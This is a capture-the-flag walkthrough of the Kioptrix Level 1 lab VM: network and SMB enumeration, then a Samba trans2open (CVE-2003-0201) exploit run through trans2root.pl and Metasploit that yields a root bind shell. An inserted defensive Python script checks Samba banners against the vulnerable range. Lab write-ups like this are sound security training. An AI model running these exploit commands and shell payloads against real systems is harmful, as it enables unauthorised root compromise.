Kioptrix – Level 1
Kioptrix Level 1 was created by @loneferret and is the first in the series of five. The description from the author is as follows:
“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.”
Sounds like a good quick challenge, so let’s get started with our usual netdiscover enumeration of the subnet and find our vulnerable host.
```
root@omerta-ctf:~# netdiscover -r 172.16.66.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 172.16.66.1     00:50:56:c0:00:13   01     060   VMWare, Inc.
 172.16.66.136   00:0c:29:9a:ca:b8   01     060   VMware, Inc.
 172.16.66.254   00:50:56:e7:28:06   01     060   VMWare, Inc.
```
Target acquired. What ports do we have open?
```
root@omerta-ctf:~# nmap -sS -Pn -n --reason -O 172.16.66.136

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-26 15:03 EST
Nmap scan report for 172.16.66.136
Host is up, received arp-response (0.00013s latency).
Not shown: 994 closed ports
Reason: 994 resets
PORT     STATE SERVICE     REASON
22/tcp   open  ssh         syn-ack
80/tcp   open  http        syn-ack
111/tcp  open  rpcbind     syn-ack
139/tcp  open  netbios-ssn syn-ack
443/tcp  open  https       syn-ack
1024/tcp open  kdm         syn-ack
MAC Address: 00:0C:29:9A:CA:B8 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds
root@omerta-ctf:~#
```
Ports 80 and 443 are both open, and those are the usual suspects I start interrogating. Unfortunately for us, both services only present the default Apache post-install page. For those of you who have been playing along with my previous Troll: 1 and Troll: 2 write-ups, you know what time it is. If you haven’t been playing along... it’s wfuzz time!
```
root@omerta-ctf:~# wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://172.16.66.136/FUZZ

********************************************************
* Wfuzz 2.0 - The Web Bruteforcer                      *
********************************************************

Target: http://172.16.66.136/FUZZ
Payload type: file,/usr/share/wfuzz/wordlist/general/big.txt

Total requests: 3036
==================================================================
ID      Response   Lines      Word         Chars          Request
==================================================================

00584:  C=403     10 L        29 W        272 Ch        " - cgi-bin/"
01696:  C=301      9 L        27 W        294 Ch        " - manual"
02842:  C=301      9 L        27 W        293 Ch        " - usage"
```
Okay... nothing overly exciting there, but let’s take a look at the usage directory.
Nice, a Webalizer statistics page. Taking a look at what page or pages have been hit recently, we can see test.php looks popular. Let’s take a look at the page:
Pretty boring. Let’s keep enumerating through our ports. Next up, SMB on port 139. Let’s connect with smbclient, ascertain the version of Samba, and see if we can list any available shares.
```
root@omerta-ctf:~# smbclient -N -L 172.16.66.136
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

        Sharename      Type      Comment
        ---------      ----      -------
        IPC$           IPC       IPC Service (Samba Server)
        ADMIN$         IPC       IPC Service (Samba Server)
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

        Server               Comment
        ---------            -------
        KIOPTRIX             Samba Server

        Workgroup            Master
        ---------            -------
        MYGROUP              KIOPTRIX
        WORKGROUP            MINION
```
Only the usual IPC$ and ADMIN$ shares. Next step, we check whether the permissions happen to be weak enough to let us connect to those shares. Alas, listing IPC$ fails with NT_STATUS_NETWORK_ACCESS_DENIED and connecting to ADMIN$ fails with NT_STATUS_WRONG_PASSWORD. Time to take a look at whether there are any known vulnerabilities, and associated exploits, for Samba 2.2.1a.
```
root@omerta-ctf:~# searchsploit samba remote 2.2 remote
 Description                                                              Path
------------------------------------------------------------------------- -------------------------
Samba 2.2.x Remote Root Buffer Overflow Exploit                          | /linux/remote/7.pl
Samba 2.2.8 - Remote Root Exploit - sambal.c                             | /linux/remote/10.c
Samba 2.2.8 (Bruteforce Method) Remote Root Exploit                      | /linux/remote/55.c
Samba 2.2.0 - 2.2.8 - trans2open Overflow (OS X)                         | /osx/remote/9924.rb
Samba 2.2.x - nttrans Overflow                                           | /linux/remote/9936.rb
Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow                              | /linux/remote/16321.rb
Samba 2.0.x/2.2 - Remote Arbitrary File Creation Vulnerability           | /unix/remote/20968.txt
Samba SMB 2.2.x                                                          | /unix/remote/22356.c
Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (1)   | /unix/remote/22468.c
Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (2)   | /unix/remote/22469.c
Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (3)   | /unix/remote/22470.c
Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (4)   | /unix/remote/22471.txt
```
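Before moving on, here is an added example (not part of the original write-up, and not code from any of the tools shown) of how the same conclusion can be reached automatically on the defending side: a small Python check that pulls the Samba version out of the anonymous smbclient banner seen above and compares it against the 2.2.0 - 2.2.8 range that the listing gives for the trans2open overflow (CVE-2003-0201). It also flags that a null (anonymous) session was accepted, since that is what exposed the banner in the first place. The sample banner text is constructed from the output above, and the function and constant names are assumptions of this example. One caveat the code handles explicitly: Samba's fix for this bug shipped as 2.2.8a, so the letter suffix must be compared rather than thrown away.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# Constructed sample: banner and share listing from an anonymous
# `smbclient -N -L` session, copied from the write-up above (not captured live).
SAMPLE_SMBCLIENT_OUTPUT = """\
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

\tSharename      Type      Comment
\t---------      ----      -------
\tIPC$           IPC       IPC Service (Samba Server)
\tADMIN$         IPC       IPC Service (Samba Server)
"""

# Samba's banner looks like: Server=[Samba 2.2.1a]
BANNER_RE = re.compile(r"Server=\[Samba (?P<ver>[0-9][0-9a-z.]*)\]")
# major.minor.patch plus an optional single-letter suffix (2.2.8 vs 2.2.8a)
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)([a-z]?)$")


@dataclass(frozen=True)
class SambaVersion:
    major: int
    minor: int
    patch: int
    suffix: str  # "" or one letter such as "a"

    def key(self) -> Tuple[int, int, int, str]:
        # Tuple ordering: "" sorts before "a", so 2.2.8 < 2.2.8a as intended.
        return (self.major, self.minor, self.patch, self.suffix)

    def __str__(self) -> str:
        return f"{self.major}.{self.minor}.{self.patch}{self.suffix}"


def parse_version(text: str) -> Optional[SambaVersion]:
    """Parse '2.2.1a' into a SambaVersion; return None on anything unexpected."""
    m = VERSION_RE.match(text.strip())
    if not m:
        return None
    return SambaVersion(int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4))


def samba_version_from_banner(output: str) -> Optional[SambaVersion]:
    """Extract the Samba version from smbclient output, if a banner is present."""
    m = BANNER_RE.search(output)
    return parse_version(m.group("ver")) if m else None


def anonymous_login_allowed(output: str) -> bool:
    """True if the server accepted a null session (the -N login succeeded)."""
    return "Anonymous login successful" in output


# Affected range taken from the searchsploit listing above (CVE-2003-0201).
# 2.2.8a, the release carrying the fix, falls just outside the upper bound.
TRANS2OPEN_LOW = SambaVersion(2, 2, 0, "")
TRANS2OPEN_HIGH = SambaVersion(2, 2, 8, "")


def affected_by_trans2open(v: SambaVersion) -> bool:
    return TRANS2OPEN_LOW.key() <= v.key() <= TRANS2OPEN_HIGH.key()


def assess_banner(output: str) -> dict:
    """Summarise what the banner tells a defender: version, exposure, next step."""
    v = samba_version_from_banner(output)
    if v is None:
        return {"version": None, "affected": False,
                "null_session": anonymous_login_allowed(output),
                "finding": "no Samba banner found"}
    affected = affected_by_trans2open(v)
    finding = (
        f"Samba {v} is within the trans2open range 2.2.0-2.2.8 (CVE-2003-0201); "
        "upgrade the Samba package and restrict port 139 until then"
        if affected
        else f"Samba {v} is outside the trans2open range"
    )
    return {"version": str(v), "affected": affected,
            "null_session": anonymous_login_allowed(output), "finding": finding}


if __name__ == "__main__":
    for key, value in assess_banner(SAMPLE_SMBCLIENT_OUTPUT).items():
        print(f"{key}: {value}")
```

Feed it the saved output of `smbclient -N -L <host>` from an inventory run and it returns a dictionary you can drop into a report or a monitoring check; for the banner above it reports version 2.2.1a, affected, with a null session allowed.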
Nice… this looks promising. Luckily for me, I came across something very similar in a certification I recently achieved. Let’s take a look at the first exploit in our list, H D Moore’s trans2root.pl exploit of CVE-2003-0201.
```
root@omerta-ctf:~/oscp/scripts/linux# ./trans2root.pl -t linx86 -H 172.16.66.132 -h 172.16.66.136 -p 139
[*] Using target type: linx86
[*] Listener started on port 1981
[*] Starting brute force mode...
[*] Return Address: 0xbf0001ffroot@omerta-ctf:~/oscp/scripts/linux#
```
Damn. It looks like the exploit almost triggered; however, we didn’t receive the expected reverse shell. Perhaps we could try a bind shell instead. Rather than spend the time altering H D Moore’s code, let’s take a look at the equivalent exploit available to us in Metasploit and set the payload to a bind shell.
```
root@omerta-ctf:~/oscp/scripts/linux# msfconsole

[Metasploit "CYBER MISSILE COMMAND V4" ASCII-art banner omitted]

       http://metasploit.pro

Love leveraging credentials? Check out bruteforcing
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.10.0-2014082101 [core:4.10.0.pre.2014082101 api:1.0.0]]
+ -- --=[ 1339 exploits - 805 auxiliary - 228 post ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > set rhost 172.16.66.136
msf exploit(trans2open) > set payload linux/x86/shell_bind_tcp
msf exploit(trans2open) > exploit

[*] Started bind handler
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Trying return address 0xbffff9fc...
[*] Command shell session 1 opened (172.16.66.132:34434 -> 172.16.66.136:4444) at 2015-01-26 16:47:06 +1000

id
uid=0(root) gid=0(root) groups=99(nobody)
uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
```
Voila! As we suspected, the exploit worked and our payload allowed us to connect via a bind shell.
Thanks @loneferret for a quick and enjoyable vulnerable boot2root VM. I look forward to taking a look at your other Kioptrix challenges. As always, cheers VulnHub for hosting the VM and making this all possible.
Until next time, tight lines and may you pop shells often.